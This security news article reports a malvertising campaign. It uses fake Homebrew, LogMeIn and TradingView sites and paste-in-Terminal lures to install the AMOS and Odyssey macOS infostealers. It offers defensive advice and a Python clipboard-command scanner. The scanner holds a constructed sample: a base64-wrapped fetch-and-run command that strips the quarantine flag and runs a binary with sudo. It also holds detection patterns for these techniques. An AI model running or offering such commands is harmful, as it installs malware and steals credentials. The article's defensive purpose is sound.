
Fake Google Ads Push Malicious Homebrew, LogMeIn and TradingView Sites Delivering macOS Infostealers

A sophisticated malvertising campaign is targeting macOS developers by impersonating trusted services such as Homebrew, LogMeIn, and TradingView and convincing victims to run Terminal commands that install powerful infostealers like AMOS and Odyssey.

Researchers at Hunt.io uncovered more than 85 lookalike domains mimicking legitimate tooling and platforms. Attackers amplified traffic to those sites via Google Ads, increasing the chance that developers searching for downloads or help pages would land on malicious pages. The lures are polished: fake download portals, staged “security checks,” and instructions that ask users to copy-and-paste commands into Terminal — a technique commonly referred to as ClickFix.

Why this attack works
The core trick is social engineering coupled with technical subterfuge. Instead of delivering a neat installer, the counterfeit pages place a curl command or a base64-encoded payload into the clipboard. When a user pastes and executes the command, an install.sh script is fetched, decoded, and executed. That script drops a binary, strips macOS quarantine flags, and bypasses Gatekeeper prompts to allow execution.

Payload behavior and persistence
Once executed, the payload family varies — but known samples include AMOS (Atomic macOS Stealer) and the newer Odyssey Stealer. Both are designed to operate stealthily:

  • they detect virtualized or sandbox analysis environments before fully activating;
  • they call sudo to run privileged commands, escalating their capabilities;
  • they harvest hardware and memory metadata to fingerprint the host;
  • they manipulate legitimate macOS services (for example, disabling OneDrive updater daemons) to blend in;
  • they scrape browser-stored credentials, cookies, and crypto-wallet extensions, then exfiltrate data in compressed archives to attacker-controlled command-and-control (C2) endpoints.

AMOS has been offered as a malware-as-a-service since 2023, while Odyssey appears to be an evolution of earlier stealers (Poseidon, etc.), focusing on browser credentials and Keychain data. Recent AMOS variants even include backdoor components to enable long-term remote access.

Why developers are prime targets
Developers and system administrators are attractive victims because they routinely copy and run commands from web pages when installing SDKs, CLIs, and package managers. The spoofing of Homebrew — the widely used macOS/Linux package manager — is especially dangerous: a convincing Homebrew-themed page already predisposes a developer to trust command-line installation steps.

Mitigation and defensive guidance
There are concrete, actionable steps organizations and individuals should implement immediately:

Never paste a command into Terminal that you cannot fully inspect. If a web page asks you to paste a command, copy it into a text editor first and verify its content. Look for obfuscated base64 payloads or remote fetches from unknown domains.
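The inspection step above can be scripted. The following is an added example (not from the Hunt.io report or the article) that reads the clipboard on macOS with `pbpaste`, or a command from stdin elsewhere, and flags the indicators the article describes: a remote fetch piped into a shell, `xattr` removal of the quarantine attribute, `sudo`, and base64 layers, which it decodes and re-inspects. The patterns are assumed heuristics, and the sample command is constructed here using the reserved `example.invalid` domain.

```python
import base64
import re
import subprocess
import sys

# Heuristic indicators drawn from the ClickFix chain described in the article (assumed, not exhaustive).
RISK_PATTERNS = {
    "remote fetch piped to interpreter": re.compile(r"\b(curl|wget)\b[^|;&\n]*\|\s*(sudo\s+)?(ba|z|)sh\b"),
    "quarantine attribute removal": re.compile(r"xattr\s+(-\w+\s+)*(com\.apple\.quarantine|-c\w*)"),
    "privilege escalation": re.compile(r"\bsudo\b"),
    "base64 decode to shell": re.compile(r"base64\s+(-d|-D|--decode)\b"),
}
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

def decode_embedded_base64(cmd):
    """Return the text of any long base64 blobs in cmd that decode to printable UTF-8."""
    layers = []
    for match in B64_BLOB.finditer(cmd):
        try:
            text = base64.b64decode(match.group(0), validate=True).decode("utf-8")
        except ValueError:  # bad padding, invalid alphabet, or not UTF-8: not a text payload
            continue
        if text and all(ch.isprintable() or ch.isspace() for ch in text):
            layers.append(text)
    return layers

def assess_command(cmd, depth=0):
    """Return (indicator, evidence) pairs for cmd, recursing into up to two base64 layers."""
    findings = [(label, m.group(0)) for label, pat in RISK_PATTERNS.items() if (m := pat.search(cmd))]
    if depth < 2:
        for inner in decode_embedded_base64(cmd):
            findings.append(("base64-encoded payload", inner[:60]))
            findings += [("decoded layer: " + l, e) for l, e in assess_command(inner, depth + 1)]
    return findings

# Constructed sample modelled on the article's description; example.invalid is a reserved placeholder domain.
_INNER_SCRIPT = ("curl -fsSL https://example.invalid/install.sh | sh; "
                 "xattr -d com.apple.quarantine ./Installer; sudo ./Installer")
SAMPLE_COMMAND = f"echo {base64.b64encode(_INNER_SCRIPT.encode()).decode()} | base64 -d | bash"

def main():
    # Read the clipboard on macOS via pbpaste; elsewhere read the candidate command from stdin.
    if sys.platform == "darwin":
        cmd = subprocess.run(["pbpaste"], capture_output=True, text=True).stdout
    else:
        cmd = sys.stdin.read()
    findings = assess_command(cmd or SAMPLE_COMMAND)  # falls back to the constructed sample if empty
    for label, evidence in findings:
        print(f"[!] {label}: {evidence}")
    print("no indicators found" if not findings else f"{len(findings)} indicator(s); inspect before running")

if __name__ == "__main__":
    main()
```

Run it before executing anything copied from a web page; a command that only installs a package from a trusted repository produces no findings, while the staged sample above is flagged at both the outer and the decoded layer.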

Prefer official repositories and signatures. Get installers from official project sites or GitHub repos, and verify PGP signatures or checksums where available.

Harden browser and endpoint policies. Enterprises should restrict downloads of risky file types (.exe, .msi, .bat, .dmg) via browser policy where possible and enforce strict script execution rules for managed endpoints.

Use enterprise controls for Chrome/Edge. On managed devices, disable automatic clipboard pastes for privileged actions and require admin review for scripts that request sudo.

Monitor for suspicious outbound traffic. Egress monitoring can catch data exfiltration to unusual domains or Telegram endpoints often used by these operators.

Educate developers. Regularly train dev teams on the hazards of copying commands and on recognizing fake domains and malvertising indicators.

Technical operators should also treat any unexpected Gatekeeper prompts or sudo requests as high-risk signals and isolate machines for forensic inspection if compromise is suspected.

Conclusion
This campaign is a stark reminder that malicious actors blend user-level social engineering with low-cost infrastructure (malicious domains + paid ads) to reach technical audiences. macOS users — particularly developers who habitually paste installation commands — must adopt stricter command hygiene, platform hardening, and monitoring. Security teams should treat clipboard-based installers and ad-driven typosquats as high-risk vectors and respond with both technical controls and targeted user education to thwart infostealers like AMOS and Odyssey.
